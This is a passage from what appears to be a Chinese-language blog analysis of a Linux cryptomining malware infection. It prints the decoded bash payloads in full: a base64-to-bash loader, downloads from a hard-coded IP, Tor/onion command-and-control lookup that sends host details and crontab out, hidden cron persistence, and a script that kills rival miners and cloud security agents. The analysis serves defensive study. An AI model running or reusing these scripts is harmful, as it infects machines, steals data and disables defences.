kfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAicnhteHB6Zmt5ZGt1bGhocW51ZnRibWY2ZDVxNjdqamNob3BtaDRvZnN6Znd3bm16NGJxcTJmaWQiKQoKc29ja3ooKSB7Cm49KGRvaC5ubC5haGFkbnMubmV0IGRucy5ob3N0dXgubmV0IHVuY2Vuc29yZWQubHV4MS5kbnMubml4bmV0Lnh5eiBkbnMucnVieWZpc2guY24gZG5zLnR3bmljLnR3IGRvaC5uby5haGFkbnMubmV0IGRvaC1maS5ibGFoZG5zLmNvbSBmaS5kb2guZG5zLnNub3B5dGEub3JnIHJlc29sdmVyLWV1LmxlbHV4LmZpIGRvaC5saSBkbnMuZGlnaXRhbGUtZ2VzZWxsc2NoYWZ0LmNoKQpwPSQoZWNobyAiZG5zLXF1ZXJ5P25hbWU9cmVsYXkudG9yMnNvY2tzLmluIikKcz0kKCRjIGh0dHBzOi8vJHtuWyQoKFJBTkRPTSUxMSkpXX0vJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8aGVhZCAtbiAxKQp9CgpmZXhlKCkgewpmb3IgaSBpbiAuICRIT01FIC91c3IvYmluICRkIC90bXAgL3Zhci90bXAgO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCn0KCnUoKSB7CnNvY2t6CmY9L2wvc3AuJCh1bmFtZSAtbSkKeD0uLyQoZGF0ZXxtZDVzdW18Y3V0IC1mMSAtZC0pCnI9JChjdXJsIC00ZnNTTGsgY2hlY2tpcC5hbWF6b25hd3MuY29tfHxjdXJsIC00ZnNTTGsgaXAuc2IpXyQod2hvYW1pKV8kKHVuYW1lIC1tKV8kKHVuYW1lIC1uKV8kKGlwIGF8Z3JlcCAnaW5ldCAnfGF3ayB7J3ByaW50ICQyJ318bWQ1c3VtfGF3ayB7J3ByaW50ICQxJ30pXyQoY3JvbnRhYiAtbHxiYXNlNjQgLXcwKQokYyAteCBzb2NrczVoOi8vJHM6OTA1MCAkdC5vbmlvbiRmIC1vJHggLWUkciB8fCAkYyAkMSRmIC1vJHggLWUkcgpjaG1vZCAreCAkeDskeDtybSAtZiAkeAp9Cgpmb3IgaCBpbiB0b3Iyd2ViLmluIHRvcjJ3ZWIuaXQKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzOyB0aGVuCmZleGU7dSAkdC4kaApscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvdG1wO3UgJHQuJGgpCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC9kZXYvc2htO3UgJHQuJGgpCmVsc2UKYnJlYWsKZmkKZG9uZQo=|base64 -d|bash"; Runtime runtime = Runtime.getRuntime(); Process process = runtime.exec(arrayOfString); } }

这一大段 base64 解出来，内容如下

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 XRANDOM exec &>/dev/null export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin function kurl() { read proto server path <<<$(echo ${1//// }) DOC=/${path// //} HOST=${server//:*} PORT=${server//*:} [[ x"${HOST}" == x"${PORT}" ]] && PORT=80 exec 3<>/dev/tcp/${HOST}/$PORT echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3 (while read line; do [[ "$line" == $'\r' ]] && break done && cat) <&3 exec 3>&- } rm -f $HOME/ss curl -V || wget -q https://github.com/moparisthebest/static-curl/releases/download/v7.75.0/curl-amd64 -O $HOME/curl;chmod +x $HOME/curl curl -V || kurl http://139.59.150.7:443/curl > $HOME/curl;chmod +x $HOME/curl ss -v || kurl http://139.59.150.7:443/ss > $HOME/ss;chmod +x $HOME/ss ss -v || curl -s http://139.59.150.7:443/ss -o $HOME/ss;chmod +x $HOME/ss ps || curl -s http://139.59.150.7:443/ps -o $HOME/ps;chmod +x $HOME/ps d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6) c=$(echo "curl -4fsSLkA- -m200") t=$(echo "rxmxpzfkydkulhhqnuftbmf6d5q67jjchopmh4ofszfwwnmz4bqq2fid") sockz() { n=(doh.nl.ahadns.net dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.no.ahadns.net doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch) p=$(echo "dns-query?name=relay.tor2socks.in") s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1) } fexe() { for i in . $HOME /usr/bin $d /tmp /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done } u() { sockz f=/l/sp.$(uname -m) x=./$(date|md5sum|cut -f1 -d-) r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0) $c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r chmod +x $x;$x;rm -f $x } for h in tor2web.in tor2web.it do if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then fexe;u $t.$h ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h) ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h) else break fi done

好家伙，过来过去，从 bash 到 elf 再到 jar，一直都是这个 bash 脚本。

一切都是为了这个 bash 脚本服务。

其中有一段下载文件的步骤，之前也看到了，但是没有仔细分析。在曾大佬的带领下，一行一行分析了这个bash的功能.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 function kurl() { read proto server path <<<$(echo ${1//// }) DOC=/${path// //} HOST=${server//:*} PORT=${server//*:} [[ x"${HOST}" == x"${PORT}" ]] && PORT=80 exec 3<>/dev/tcp/${HOST}/$PORT echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3 (while read line; do [[ "$line" == $'\r' ]] && break done && cat) <&3 exec 3>&- } rm -f $HOME/ss curl -V || wget -q https://github.com/moparisthebest/static-curl/releases/download/v7.75.0/curl-amd64 -O $HOME/curl;chmod +x $HOME/curl curl -V || kurl http://139.59.150.7:443/curl > $HOME/curl;chmod +x $HOME/curl ss -v || kurl http://139.59.150.7:443/ss > $HOME/ss;chmod +x $HOME/ss ss -v || curl -s http://139.59.150.7:443/ss -o $HOME/ss;chmod +x $HOME/ss ps || curl -s http://139.59.150.7:443/ps -o $HOME/ps;chmod +x $HOME/ps

这个 kurl，试图在没有 curl，没有 wget 的情况下，依赖 bash 内置功能，下载 curl。看起来这个攻击者是想要在类似于 docker 内部这样的刀耕火种的原始环境里面实现挖矿的功能。

我推测攻击者会一些计算机编程，但是功底肯定不会这么深厚，这段代码很可能不是攻击者自己写的。要是他有手写这个代码的水平，那肯定不会搞挖矿这个行当了。带着这个疑问，搜索了一圈，找到了代码的出处

分析过来分析过去，没看到其他有用的信息了，根据努力不一定能成功，放弃一定很轻松的指导方针，tracepath 这个文件的分析暂时到此为止。

EQnR3jNR

这个文件的主要作用是通过 crontab 添加持久化， 通过多种方式横向移动的功能。

通过动态调试该文件，可以看到执行了如下的 bash 命令。

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 nU9WagjQ8BenWPXt0ovE12uD8jBItv6 exec &>/dev/null export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6) x() { if ! ls $d/.systemd-private-*.sh; then grep "nU9WagjQ8BenWPXt0ovE12uD8jBItv6" $d/.systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6.sh || echo -e "#\x21/bin/bash\nexec &>/dev/null\necho nU9WagjQ8BenWPXt0ovE12uD8jBItv6\necho blU5V2FnalE4QmVuV1BYdDBvdkUxMnVEOGpCSXR2NgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI1aXhoaWVlem96eHdudmlzb3BneG9iYTZzc2JzcnZkcHhlZHV4YjRqYzZ6eDdzNTZydWZyanphZCIpCgpzb2NreigpIHsKbj0oZG9oLnRoaXMud2ViLmlkIGRvaC5wb3N0LWZhY3R1bS50ayBkbnMuaG9zdHV4Lm5ldCB1bmNlbnNvcmVkLmx1eDEuZG5zLm5peG5ldC54eXogZG5zLnJ1YnlmaXNoLmNuIGRucy50d25pYy50dyBkb2gtZmkuYmxhaGRucy5jb20gZmkuZG9oLmRucy5zbm9weXRhLm9yZyByZXNvbHZlci1ldS5sZWx1eC5maSBkb2gubGkgZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnM9JCgkYyBodHRwczovLyR7blskKChSQU5ET00lMTEpKV19LyRwIHwgZ3JlcCAtb0UgIlxiKFswLTldezEsM31cLil7M31bMC05XXsxLDN9XGIiIHx0ciAnICcgJ1xuJ3xncmVwIC1FdiBbLl0wfHNvcnQgLXVSfGhlYWQgLW4gMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash" > $d/.systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6.sh touch -r /bin/grep $d/.systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6.sh chmod +x $d/.systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6.sh fi if ! ls /opt/systemd-private-*.sh; then grep "nU9WagjQ8BenWPXt0ovE12uD8jBItv6" /opt/systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6.sh || echo -e "#\x21/bin/bash\nexec &>/dev/null\necho nU9WagjQ8BenWPXt0ovE12uD8jBItv6\necho blU5V2FnalE4QmVuV1BYdDBvdkUxMnVEOGpCSXR2NgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI1aXhoaWVlem96eHdudmlzb3BneG9iYTZzc2JzcnZkcHhlZHV4YjRqYzZ6eDdzNTZydWZyanphZCIpCgpzb2NreigpIHsKbj0oZG9oLnRoaXMud2ViLmlkIGRvaC5wb3N0LWZhY3R1bS50ayBkbnMuaG9zdHV4Lm5ldCB1bmNlbnNvcmVkLmx1eDEuZG5zLm5peG5ldC54eXogZG5zLnJ1YnlmaXNoLmNuIGRucy50d25pYy50dyBkb2gtZmkuYmxhaGRucy5jb20gZmkuZG9oLmRucy5zbm9weXRhLm9yZyByZXNvbHZlci1ldS5sZWx1eC5maSBkb2gubGkgZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnM9JCgkYyBodHRwczovLyR7blskKChSQU5ET00lMTEpKV19LyRwIHwgZ3JlcCAtb0UgIlxiKFswLTldezEsM31cLil7M31bMC05XXsxLDN9XGIiIHx0ciAnICcgJ1xuJ3xncmVwIC1FdiBbLl0wfHNvcnQgLXVSfGhlYWQgLW4gMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash" > /opt/systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6.sh touch -r /bin/grep /opt/systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6.sh chmod +x /opt/systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6.sh fi if ! ls /etc/cron.d/0systemd-private-*; then grep nU9WagjQ8BenWPXt0ovE12uD8jBItv6 /etc/cron.d/0systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6 || echo "$(echo $((RANDOM%59))) * * * * root /opt/systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6.sh > /dev/null 2>&1 &" > /etc/cron.d/0systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6 touch -r /bin/grep /etc/cron.d/0systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6 fi if ! crontab -l | grep ^[0-9] | grep systemd-private; then (echo "$(echo $((RANDOM%59))) * * * * $d/.systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6.sh > /dev/null 2>&1 &";crontab -l|grep -v systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6.sh)|crontab - fi } x

解 base64 之后可以发现功能是检查 $HOME/.systemd-private-*.sh 是否存在，如果不存在，那么把前面分析过的恶意脚本的内容加进去。运气比较好，刚开始在机器上手撕病毒的时候，这几个自启动恶意程序都删掉了。

代码里面包含大量的 bash64编码的内容。逆向分析的主要工作是动态调试然后解 base64和解决 00 截断导致的错误然后继续解base64 :)

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 nU9WagjQ8BenWPXt0ovE12uD8jBItv6 exec &>/dev/null export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin find /etc/cron*|xargs chattr -i;find /var/spool/cron*|xargs chattr -i;chattr -i /etc/hosts crontab -l ;grep -iRE "Evie0EAJrdlD6N9|tEYYDFeOnouIdvpQ|vPUjpEzwu4WUekG|systemd-service|data/pg_|main/pg_|pg_logical|cache/auto|ctlib|70OXQG|Malware|Miner|VUses5|\-unix|\.\/oka|\.configrc|\.rsync|\/upd|aliyun|basht|bffbe|curl|jqu\.js|jqu2|kill_virus|virus|kpccv|malware|mazec|nullc|qcloud|rvlss|ryukd|system-python3.8-Updates|systemd-init|th2ps|titanagent|tmp00|ucxin|unixdb|unixoa|wget|wlvly|xzfix|pg_stat|pty3|zsvc|pdefenderd|smcard2|wakuang|delmining|base64" /etc/cron.*|cut -f 1 -d :|xargs rm -f crontab -l |grep -ivE "Evie0EAJrdlD6N9|tEYYDFeOnouIdvpQ|vPUjpEzwu4WUekG|systemd-service|data/pg_|main/pg_|pg_logical|cache/auto|ctlib|70OXQG|Malware|Miner|VUses5|\-unix|\.\/oka|\.configrc|\.rsync|\/upd|aliyun|basht|bffbe|curl|jqu\.js|jqu2|kill_virus|virus|kpccv|malware|mazec|nullc|qcloud|rvlss|ryukd|system-python3.8-Updates|systemd-init|th2ps|titanagent|tmp00|ucxin|unixdb|unixoa|wget|wlvly|xzfix|pg_stat|pty3|zsvc|pdefenderd|smcard2|wakuang|delmining|base64" |crontab - crontab -l |grep -v "[*] [*] [*] [*] [*] /var/lib/pgsql"|crontab - crontab -l |grep -v "[*] [*] [*] [*] [*] /var/lib/postgresql"|crontab - crontab -l |grep -v "[*] [*] [*] [*] [*] /var/log/postgresql"|crontab - crontab -l |grep -v "[*] [*] [*] [*] [*] /etc/postgresql/"|crontab - grep -q onion /etc/hosts && sed -i '/onion/d' /etc/hosts grep -q tor2w /etc/hosts && sed -i '/tor2w/d' /etc/hosts netstat -antp|grep -E "82.114.253.13|14.17.70.144|3.125.10.23|103.53.210.34|45.64.130.147|34.252.195.254|103.3.62.64|104.140.201.42|104.140.244.186|107.178.104.10|107.191.99.221|107.191.99.95|116.203.73.240|131.153.56.98|131.153.76.130|136.243.102.154|138.201.20.89|138.201.27.243|138.201.36.249|139.162.132.70|139.162.60.220|139.162.81.90|139.99.101.197|139.99.101.198|139.99.101.232|139.99.102.70|139.99.102.71|139.99.102.72|139.99.102.73|139.99.102.74|139.99.120.50|139.99.120.75|139.99.123.196|139.99.124.170|139.99.125.38|139.99.156.30|139.99.68.128|142.44.242.100|142.44.243.6|144.217.14.109|144.217.14.139|147.135.37.31|149.202.42.174|149.202.83.171|15.236.100.141|151.80.144.188|158.69.25.62|158.69.25.71|158.69.25.77|163.172.203.178|163.172.206.67|163.172.207.69|163.172.226.114|163.172.226.137|172.104.143.224|172.104.151.232|172.104.159.158|172.104.165.191|172.104.247.21|172.104.76.21|172.105.205.58|172.105.205.68|172.105.210.117|172.105.211.250|172.105.235.97|178.63.100.197|18.180.72.219|18.210.126.40|192.110.160.114|192.99.69.170|195.154.62.247|195.201.12.107|199.231.85.124|207.246.100.198|213.32.29.143|213.32.74.157|217.182.169.148|23.88.160.140|3.0.193.200|37.187.95.110|37.59.43.131|37.59.44.193|37.59.44.93|37.59.54.205|37.59.55.60|37.9.3.26|45.32.71.82|45.76.65.223|45.79.192.137|45.79.200.97|45.79.204.241|45.79.210.48|46.4.120.18|47.101.30.124|5.196.13.29|5.196.23.240|51.15.54.102|51.15.55.100|51.15.55.162|51.15.58.224|51.15.65.182|51.15.67.17|51.15.69.136|51.15.78.68|51.255.34.118|51.255.34.79|51.255.34.80|51.81.245.40|54.188.223.206|54.37.7.208|66.42.105.146|78.46.49.222|78.46.87.181|81.25.55.79|81.91.189.245|88.99.142.163|88.99.193.240|88.99.242.92|91.121.140.167|94.130.12.27|94.130.12.30|94.130.143.162|94.130.165.85|94.130.165.87|94.130.239.15|94.23.23.52|94.23.247.226|95.216.209.67|205.185.118.204|63.250.33.43|185.199.11|139.99.121.227|199.192.30.2|185.156.179.225|45.129.2.107|194.87.102.77|172.83.155.151|185.165.171.78|70.39.125.244|205.185.118.204|54.37.7.208|209.141.38.71|150.107.76.231|107.167.7.226|194.40.243.61|195.3.146.118|20.53.100.173|20.62.240.187|94.130.164.163|45.9.148.117|168.235.88.209|161.97.140.214|193.23.250.136|95.216.46.125|95.181.179.88|104.244.78.33|15.228.36.177|203.107.32.162|194.38.20.199"|awk {'print $NF'} |cut -d/ -f1|xargs kill -9 pkill -9 -f "kthreaddi|defunct|./cron|./oka|\-unix|/tmp/ddgs|/tmp/idk|/tmp/java|/tmp/keep|/tmp/udevs|/tmp/udk|/tmp/update.sh|/tmp/yarn|/usr/bin/netfs|8220|AliHids|AliSecGuard|AliYunDun|descargars|Donald|HT8s|Jonason|steasec|salt-store|salt-minion|SzdXM|X13-unix|X17-unix|\[stea\]|aegis_|AliYunDun|AliHids|AliHips|AliYunDunUpdate|aliyun-service|azipl|bash64|bigd1ck|cr.sh|crloger|cronds|crun|cryptonight|curn|currn|ddgs|dhcleint|fs-manager|gf128mul|havegeds|httpdz|irqbalanced|JavaUpdate|system-python3.8-Updates|java-c|kaudited|kdevtmpfsi|kerberods|khugepageds|kinsing|kintegrityds|kpsmouseds|swapd0|kswaped|knthread|kthreadds|kthrotlds|kw0|kworkerds|kworkre|kwroker|liog|lsof|lopata|Macron|mewrs|migrations|miner|mmm|mr.sh|muhsti|mygit|netdns|networkservice|orgfs|pamdicks|pastebin|postgresq1|qW3xT|qwefdas|rctlcli|sleep|stratum|sustes|sustse|sysguard|sysguerd|systeamd|systemd-network|sysupdate|sysupdata|t00ls|thisxxs|Trump|update.sh|vTtHH|watchbog|watchbug|watchog|wipefs|wnTKYg|x3Wq|xig|xmr|zer0|zsvc|pdefenderd|smcard2|rcu_sched" ps x |grep -v grep|grep -E "kthreaddi|defunct|kinsing|kdevtmpfs|./oka|zsvc|pdefenderd|smcard2|swapd0|rcu_sched|AliSecGuard|AliYunDunUpdate|AliYunDun|aliyun-service|assist_daemon"|awk '{print $1}' |xargs -I % kill -9 % ss -antp |grep -E "82.114.253.13|14.17.70.144|3.125.10.23|103.53.210.34|45.64.130.147|34.252.195.254|kinsing|kdevtmpfsi|103.3.62.64|104.140.201.42|104.140.244.186|107.178.104.10|107.191.99.221|107.191.99.95|116.203.73.240|131.153.56.98|131.153.76.130|136.243.102.154|138.201.20.89|138.201.27.243|138.201.36.249|139.162.132.70|139.162.60.220|139.162.81.90|139.99.101.197|139.99.101.198|139.99.101.232|139.99.102.70|139.99.102.71|139.99.102.72|139.99.102.73|139.99.102.74|139.99.120.50|139.99.120.75|139.99.123.196|139.99.124.170|139.99.125.38|139.99.156.30|139.99.68.128|142.44.242.100|142.44.243.6|144.217.14.109|144.217.14.139|147.135.37.31|149.202.42.174|149.202.83.171|15.236.100.141|151.80.144.188|158.69.25.62|158.69.25.71|158.69.25.77|163.172.203.178|163.172.206.67|163.172.207.69|163.172.226.114|163.172.226.137|172.104.143.224|172.104.151.232|172.104.159.158|172.104.165.191|172.104.247.21|172.104.76.21|172.105.205.58|172.105.205.68|172.105.210.117|172.105.211.250|172.105.235.97|178.63.100.197|18.180.72.219|18.210.126.40|192.110.160.114|192.99.69.170|195.154.62.247|195.201.12.107|199.231.85.124|207.246.100.198|213.32.29.143|213.32.74.157|217.182.169.148|23.88.160.140|3.0.193.200|37.187.95.110|37.59.43.131|37.59.44.193|37.59.44.93|37.59.54.205|37.59.55.60|37.9.3.26|45.32.71.82|45.76.65.223|45.79.192.137|45.79.200.97|45.79.204.241|45.79.210.48|46.4.120.18|47.101.30.124|5.196.13.29|5.196.23.240|51.15.54.102|51.15.55.100|51.15.55.162|51.15.58.224|51.15.65.182|51.15.67.17|51.15.69.136|51.15.78.68|51.255.34.118|51.255.34.79|51.255.34.80|51.81.245.40|54.188.223.206|54.37.7.208|66.42.105.146|78.46.49.222|78.46.87.181|81.25.55.79|81.91.189.245|88.99.142.163|88.99.193.240|88.99.242.92|91.121.140.167|94.130.12.27|94.130.12.30|94.130.143.162|94.130.165.85|94.130.165.87|94.130.239.15|94.23.23.52|94.23.247.226|95.216.209.67|205.185.118.204|63.250.33.43|185.199.11|139.99.121.227|199.192.30.2|185.156.179.225|45.129.2.107|194.87.102.77|172.83.155.151|185.165.171.78|70.39.125.244|205.185.118.204|54.37.7.208|209.141.38.71|150.107.76.231|107.167.7.226|194.40.243.61|195.3.146.118|20.53.100.173|20.62.240.187|94.130.164.163|45.9.148.117|168.235.88.209|161.97.140.214|193.23.250.136|95.216.46.125|95.181.179.88|104.244.78.33|15.228.36.177|203.107.32.162|194.38.20.199" |awk -F, {'print $(NF-1)'}|sed 's/pid=//g' |xargs kill -9 rm -f $HOME/.{Evie0EAJrdlD6N9,tEYYDFeOnouIdvpQ,vPUjpEzwu4WUekGs,systemd-service}.sh rm -f /opt/.{Evie0EAJrdlD6N9,tEYYDFeOnouIdvpQ,vPUjpEzwu4WUekGs,systemd-service}.sh ps ax -o "pid %cpu cmd"|grep bash|awk '{if($2>=20.0) print $1}'|xargs kill -9

上面这个脚本，我一直没有看太懂想干嘛，看起来像是在清理痕迹，灾后重建，又像是在清理竞争对手的挖矿木马，我没看懂他想干嘛，先跳过吧。

还有一段比较有趣的脚本。这看起来应该就是和前面 zscaler 提到的横向移动的功能了。

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 nU9WagjQ8BenWPXt0ovE12uD8jBItv6 exec &>/dev/null export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6) c=$(echo "curl -4fsSLkA- -m200") t=$(echo "5ixhieezozxwnvisopgxoba6ssbsrvdpxeduxb4jc6zx7s56rufrjzad") sockz() { n=(doh.this.web.id doh.post-factum.tk dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch) p=$(echo "dns-query?name=relay.tor2socks.in") s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1) } fexe() { for i in . $HOME /usr/bin $d /tmp /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done } isys() { echo 